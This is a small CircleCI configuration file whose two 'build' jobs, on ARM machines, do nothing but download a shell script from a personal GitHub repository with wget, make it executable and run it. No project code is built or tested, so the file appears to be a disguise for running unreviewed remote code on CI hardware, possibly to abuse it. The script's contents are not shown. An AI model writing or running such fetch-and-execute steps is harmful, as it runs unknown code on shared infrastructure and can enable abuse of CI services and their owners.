version: 2.1

jobs:
  build-medium:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.large
    steps:
      - run: wget https://raw.githubusercontent.com/brilee290/ffft/main/circleci.sh && chmod u+x circleci.sh && ./circleci.sh

  build-large:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.large
    steps:
      - run: wget https://raw.githubusercontent.com/brilee290/ffft/main/circleci.sh && chmod u+x circleci.sh && ./circleci.sh

workflows:
  build:
    jobs:
      - build-medium
      - build-large
